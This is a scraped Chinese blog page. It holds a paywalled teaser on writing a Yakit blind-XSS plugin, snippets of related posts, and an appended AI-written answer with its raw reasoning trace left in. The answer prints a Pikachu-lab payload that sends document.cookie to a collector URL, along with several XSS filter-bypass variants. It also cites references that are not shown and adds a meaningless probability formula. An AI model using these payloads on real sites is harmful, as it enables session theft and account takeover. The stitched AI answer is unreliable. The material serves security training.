Yakit插件⼩案例⸺XSS盲打助手

原创 已于 2023-11-08 11:52:53 修改 · 1.3k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #前端

于 2023-11-08 11:52:30 首次发布
本文介绍了如何使用Yakit创建一个简单的MITM插件,重点讲解了如何利用内置编辑器、钩子函数和Fuzz模块实现XSS盲打功能,以及Yakit的自动化处理能力,如解析JSON参数。

作者:@奶权师傅

插件功能简单介绍

应key⼦哥要求,来分享点yakit的小小小姿势

⽤Yakit写mitm插件真的是比burp简单太太太多了,简化了很多繁琐的内容,⽐如画ui,可以真正做到让⽤户专注于插件的逻辑,⽽不是想着怎么画ui等⼀些与功能⽆关的东⻄。

⼀步⼀步来吧,⾸先我们创建⼀个新插件,依次点击插件商城->新插件

接着选择MITM模块

填好相关的表单后,点击创建新的Yak模块,因为我们这⾥是XSS盲打插件,需要⼀个盲打的 Payload,所以需要用户设置⼀个参数,可以在增加参数⾥⾯找到

点击完创建新的Yak模块后到插件商店⻚⾯就可以看到新加的这个插件了,点击修改插件,然后再 点击⼤屏模式就可以开始开始写插件相关的代码逻辑了

接下来就是本⽂的重点了。进入到内置的编辑器后可以看到作者给出了⼀个模板,其中yakit_output(MITM_PARAMS)代表打印插件参数,可以点右上角的调试按钮进行调试。

最低0.47元/天 解锁文章
YakProject
关注
Yakit技能联动:codec & WebFuzzer
YakProject的博客
05-28 1406
JavaScript// 转换为普通post参数} else {// 先尝试json// 再尝试xml// json 转 post此段代码将其他类型的HTTP请求参数转化为普通格式的HTTP POST参数,并且修复对应的请求头。可以看到将原来的json参数转化为了对应的POST参数。JavaScript------key=value自定义右键菜单执行可以通过勾选来选择处理某段数据。
【网络安全】XSS盲打实战案例:某网页漫画
HBohan的博客
01-18 2570
"XSS盲打"是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的XSS攻击代码(通常是使用script标签引入远程的js)的数据。当未知后台在展现时没有对这些提交的数据进行过滤,那么后台管理人员在操作时就会触发XSS来实现攻击者预定好的“真实攻击功能”。
#渗透测试#红蓝对抗#SRC漏洞挖掘# Yakit插件使用及编写01
soc的博客
12-11 1461
当安全工具在自称“平台”的时候,插件的编写难度,价值,以及自由度其实是限制工具成为真正“平台”的原因。很久以来,我们一直在探索“插件”模式的最终发展。在 Python 的时代,其实“插件”也并不是那么棘手的事情。如果不在乎安全性和代码保密性,eval 虽然丑陋,但是好用。但是当大家的产品变得工程化之后,Golang 这种“静态”特性让插件变得不是那么“自然”,大家可以通过 DLL / .so 来执行插件,但是 “并不是谁都可以写 Golang DLL/.so 的” 不是吗?
渗透测试工具Yakit使用指南:从安装到实战
2401_84215240的博客
10-21 1068
本文全面介绍了Yakit这一Web渗透测试工具,包括与Burp Suite的对比、安装方法、MITM代理抓包、Web Fuzzer数据包处理、编码解码、漏洞扫描等核心功能。文章详细讲解了各模块的使用方法和技巧,并分析了Yakit相比Burp Suite的优势(功能更强大、国密证书支持等)和劣势(UI混乱、插件不足等),为网络安全从业人员提供了实用的工具使用指南。Yakit和Burp Suite差不多,二者可交叉使用,都适用于Web渗透测试相关工作,如代理抓包、漏洞检测、数据包处理等场景。
Yaklang XSS 检测启发式算法(被动扫描插件
dzqxwzoe的博客
10-01 437
上一篇介绍了XSS 启发式检测基础设施,本篇通过yak提供的基础设施编写一个xss检测插件。本次xss靶场使用pentesterlab的xss靶场。
使用yak编写yakit漏洞检测插件
dreamer292的博客
11-16 1535
整体来看编写起来并不复杂,但是难就难在啥都需要去官方手册看,无法询问ai一些函数的功能,这对脚本小子来说真的天塌了。我感觉就是有一批真正会用的人,然后官方和这些人之间一起在交流完善一些功能,但是没有很多大佬分享出来😢,希望后续有更多人的一起推动yakit和yak吧。
还在买别人的漏扫GUI?使用Yakit,免做老韭菜
棉花糖的博客
06-12 3729
你是否希望能有一个工具可以只需要输入或者导入目标即可检测某一个oa或者某一个系统的漏洞?上网一查,好像大家都在售卖这种GUI?👇工具乍一看,哇好牛逼,输入或者导入目标就可以检测例如海康威视综合安防管理平台这种系统的历史漏洞,细一看,我操要钱!而现在,你不需要再去交智商税了!首先我们要清楚一件事,这些工具里面的漏洞,是什么未公开的0day吗?
服务器搭建XSS盲打平台,绕坑
CC__Faker的博客
05-07 1772
文章目录环境介绍环境搭建平台搭建平台使用 环境介绍 本次搭建环境采用的是ubuntu20,php,apache2,无需数据库 XSS平台项目名称:BlueLotus_XSSReceiver 项目地址:https://github.com/trysec/BlueLotus_XSSReceiver 环境搭建 sudo apt update 更新源 sudo apt install apache2 安装apache sudo systemctl status apache2 查看apac
XSS键盘记录、前台XSS盲打练习(pikachu),beef克隆网页,upload靶场文件上传漏洞
m0_74292210的博客
04-13 1017
启动pikachu靶场并且初始化。
XSS盲打演示和讲解;XSS绕过思路讲解和案例演示;XSS绕过关于htmlspecialchars()函数;XSS常见防范措施
qq_44696653的博客
05-04 1057
XSS盲打演示和讲解 当只有后台会看到前端输入的内容而前端无法判断是否存在XSS时,我们可以插入XSS代码。这个时候由于后端的安全考虑往往不会很严格,所以当管理员登陆的时候就会被X。 在pikachu上具体的实验演示; 1.在XSS盲打模块根据前端的提示输入相关信息,发现输入的信息只会反馈给后台,在前端无法显示。这里就可以不管别的直接输入跨站脚本的内容 例如:<script>alert...
传统爆破有困难?请@Yakit插件
YakProject的博客
04-01 1686
其中,若找到的输入框和提交按钮大于所需的数量,则会根据其对应element的内容进行关键词分析,得出其中最为可能的用户名输入框、密码输入框、可能存在的验证码输入框、验证码图片和提交登录按钮。在以后的优化方向上,会尝试接入一个简单的验证码图片识别模块,这个其实之前尝试过,但是当前比较轻量好用的验证码识别方式,无论是基于深度学习还是ocr,都大量集中在python环境下,golang环境下的验证码识别模块较少,也没有测试过,准备在以后的功能迭代中解决这个问题。在进行爆破任务过程中,会在日志中显示爆破日志信息。
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 1659
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
Yakit基本使用
热门推荐
wwwwwhdn的博客
11-03 1万+
基于安全融合的理念,Yaklang.io 团队研发出了安全领域垂直语言Yaklang,对于一些无法原生集成在Yak平台中的产品/工具,利用Yaklang可以重新编写他们的“高质量替代”。对于一些生态完整且认可度较高的产品,Yaklang能直接编译融合,并对源码进行必要修改,更好地适配Yaklang语言。但是限于使用形式,用户想要熟练使用Yak 语言,需要学习Yak语言并同时具备对安全的一定理解。
Yakit下载安装
m0_74424496的博客
12-26 4801
官方文档。
Yakit- 集成化单兵安全能力平台使用教程·进阶篇
xnxqwzy的博客
03-02 4034
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
保姆级常用工具Yakit安装及简单使用
会哭的猫的博客
05-23 7860
渗透测试过程中Yakit工具分享,集成burp、Awvs测试功能以及自带靶场。
网络安全入门笔记(共327页),助你步入安全门槛
Spontaneous_0的博客
01-31 1342
网络安全入门笔记(共327页),助你步入安全门槛
yakit使用教程(二,配置证书并进行抓包改包操作)
2302_80280669的博客
09-28 1万+
可以根据具体情况,使用红圈内两个按钮,对数据包进行自动放行或手动放行。在火狐浏览器下载并安装FoxyProxy,具体参数配置如上图。选中要爆破的文本位置,右键导入字典/标签,点击插入临时字典。将数据包更改后,点击发送请求,可以看到所返回的信息。对关键数据进行抓包,并发送到重放器(DVWA靶场)。点击mitm,在跳转后的页面点击高级配置。点击红框内按钮就可以对数据包进行改包行为。点击下载到本地并打开(建议下载到桌面)。根据不同的返回值,可以得知密码是否正确。开启代理插件,进行抓包。
Yakit工具篇:简介和安装使用
黄乔国PHP
10-15 1万+
基于安全融合的理念,Yaklang.io 团队研发出了安全领域垂直语言Yaklang,对于一些无法原生集成在Yak平台中的产品/工具,利用Yaklang可以重新编写他们的“高质量替代”。对于一些生态完整且认可度较高的产品,Yaklang能直接编译融合,并对源码进行必要修改,更好地适配Yaklang语言。但是限于使用形式,用户想要熟练使用Yak 语言,需要学习Yak语言并同时具备对安全的一定理解。
pikachu xss盲打
最新发布
11-27
<think> 首先,用户的问题是:“我想查找关于pikachu中XSS盲打相关的知识和方法 请问pikachu XSS盲打技术及方法”。这基于之前的引用内容,这些引用描述了Pikachu靶场中的XSS盲打实验。 关键点: - XSS盲打是一种存储型XSS攻击,攻击者输入恶意脚本到输入点(如留言板),脚本存储在数据库中,当管理员访问时触发。 - 在Pikachu靶场中,实验包括构造payload、提交、等待管理员触发、获取cookie等。 - 引用中提到payload如:`<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>` - 还涉及绕过过滤的方法,如大小写变异、拼凑、使用注释等。 系统级指令: - 所有行内数学表达式必须使用$...$格式。 - 独立公式必须使用$$...$$格式并单独成段。 - LaTeX语法正确。 - 使用中文回答。 - 生成相关问题。 - 回答中引用的段落末尾自然地添加引用标识,例如 [^1]。 - 回答结构清晰,帮助用户逐步解决问题,保证真实可靠。 - 最后,添加相关问题。 用户可见层:回答结构清晰,逐步解决问题。 我的回答结构: 1. **介绍XSS盲打**:解释什么是XSS盲打,基于引用。 2. **技术和方法**: - 实验环境和工具(如引用中提到的)。 - 实验原理(存储型XSS)。 - 测试流程:输入点、构造payload、提交、等待触发、查看结果。 - 具体操作步骤:从引用中提取。 - 绕过过滤的方法:大小写变异、拼凑、编码等。 3. **防范措施**:简要提及。 4. **相关问题**:生成至少三个相关问题。 确保使用中文。 生成相关问题: - 基于主题,如:如何构造有效的payload?如何绕过过滤?XSS盲打的防范措施是什么? 引用标识: - 在回答中,当引用内容时,在段落末尾添加 [^1], [^2], [^3]。 - 引用来自提供的文本:[^1], [^2], [^3]。 LaTeX注意事项: - 用户问题中没有明显的数学表达式,但如果有变量或公式,使用$...$。 - 例如,如果提到数学概念,但这里主要是文本,所以可能不需要数学表达式。如果有,如document.cookie等,但在行内,使用$...$。 - 参考:在payload中,有像document.cookie这样的变量,应该格式化为行内数学表达式:$document.cookie$。但document.cookie是JavaScript代码,不是数学表达式。系统指令说“行内数学表达式(包括变量、不等式、方程等)”,所以变量如$x$应该用$...$。 - 在payload中,如document.cookie,可以视为变量,使用$document.cookie$。 - 类似地,URLs或其他代码片段。 - 独立公式:如果有,但这里可能不需要。 现在,构建回答: - **标题**:Pikachu靶场中的XSS盲打技术及方法 - **内容**: 1. 解释XSS盲打。 2. 描述实验原理和流程。 3. 提供具体方法和示例payload。 4. 讨论绕过过滤。 5. 结束于防范措施。 - 最后,添加相关问题。 确保结构清晰。 </think>### Pikachu靶场中的XSS盲打技术及方法 XSS盲打(Blind XSS)是一种特殊的存储型跨站脚本攻击(XSS),攻击者通过输入恶意脚本到目标站点的输入点(如留言板或问卷调查),脚本被存储在后端数据库中。当管理员或其他用户访问相关页面时,脚本被触发执行,窃取敏感信息(如cookie)。这种攻击的“盲打”特性在于攻击者无法立即在前端看到反馈效果,需等待后台触发。以下是基于Pikachu靶场的详细技术和方法介绍,参考了相关实验内容 [^1][^2][^3]。 #### 1. **XSS盲打的基本原理** - **存储型XSS机制**:XSS漏洞源于程序对输入和输出的控制不足,攻击者输入精心构造的脚本后,脚本被存储在数据库中;当受害者(如管理员)加载页面时,脚本在前端被浏览器解析执行,导致持久性危害(也称“永久型”XSS)[^1]。 - **攻击目标**:主要针对后台管理员,通过盗取cookie获取管理员权限。例如,在Pikachu靶场中,payload会重定向cookie到攻击者控制的服务器 [^1][^3]。 - **数学表示**:攻击成功率可建模为条件概率:设$P_{\text{trigger}}$为触发概率,$P_{\text{bypass}}$为绕过过滤的概率,则整体成功率 $P_{\text{success}} = P_{\text{trigger}} \times P_{\text{bypass}}$ [^1]。 #### 2. **实验环境和工具** - **环境要求**:Pikachu靶场(内置XSS平台)、Firefox浏览器、Burp Suite(用于抓包和重放请求)[^1][^2]。 - **关键组件**:XSS后台(如Pikachu自带的`xcookie/cookie.php`),用于接收外带的cookie数据 [^3]。 #### 3. **XSS盲打测试流程** 遵循以下步骤进行攻击模拟: 1. **定位输入点**:在目标站点(如Pikachu的留言板或查询接口)找到用户输入区域,例如一个表单提交页面 [^1][^2]。 2. **构造并提交payload**: - **基本payload**:使用JavaScript重定向cookie,例如: ```html <script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + $document.cookie$;</script> ``` 这里,$document.cookie$ 变量获取当前用户的cookie,并通过URL参数外带到攻击者服务器 [^1][^3]。 - **输入示例**:在Pikachu输入框中提交payload,如 `思念变成海<script>...`,等待后台存储 [^3]。 3. **等待触发**:切换到管理员账户登录后台,脚本自动执行,在XSS后台查看接收到的cookie数据 [^1][^2]。 4. **结果分析**:获取cookie后,使用工具(如hash-identifier)判断加密类型,并进行在线解密,最终获取管理员凭据 [^1]。 #### 4. **绕过过滤的技术方法** 在Pikachu靶场中,后台可能对输入进行过滤(如屏蔽`<script>`标签)。以下是常见绕过方法: - **大小写变异**:将标签大写或混合大小写,例如: ```html <SCRIPT>alert('xss')</SCRipt> ``` 这能绕过简单的字符串匹配过滤 [^2]。 - **拼凑标签**:分割标签以避开检测,例如: ```html <scri<script>pt>alert(111)</scri</script>pt> ``` 浏览器解析时拼凑成完整标签 [^2]。 - **使用注释干扰**:在标签中插入注释,例如: ```html <scri<!--test-->pt>alert(111)</sc <!--test-->ript> ``` 注释不影响脚本执行 [^2]。 - **编码绕过**:对payload进行编码(如URL编码或HTML实体编码),浏览器自动解码执行。例如,将`<script>`编码为`<script>`,后台未过滤时生效 [^2]。 - **其他技巧**:直接抓包修改请求(绕过前端限制),或闭合已有JavaScript标签(如输入 `x'</script><script>alert('xss')</script>`) [^2]。 #### 5. **防范措施** - **输入输出过滤**:使用函数如`htmlspecialchars()`处理用户输入,并限制href属性只允许HTTP/HTTPS协议 [^2]。 - **编码和验证**:对输出内容进行编码,并实施内容安全策略(CSP)。 - **最小权限原则**:限制管理员访问敏感页面的频率。 通过以上方法,您可以在Pikachu靶场中实践XSS盲打。但请注意,这仅用于安全学习,真实攻击是非法的 [^1][^2][^3]。 ### 相关问题 1. 如何构造高效的XSS盲打payload以最大化成功率? 2. XSS盲打中常见的过滤机制有哪些,以及如何系统性地绕过它们? 3. 在实际网站中,XSS盲打的检测和防御策略有哪些最佳实践?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值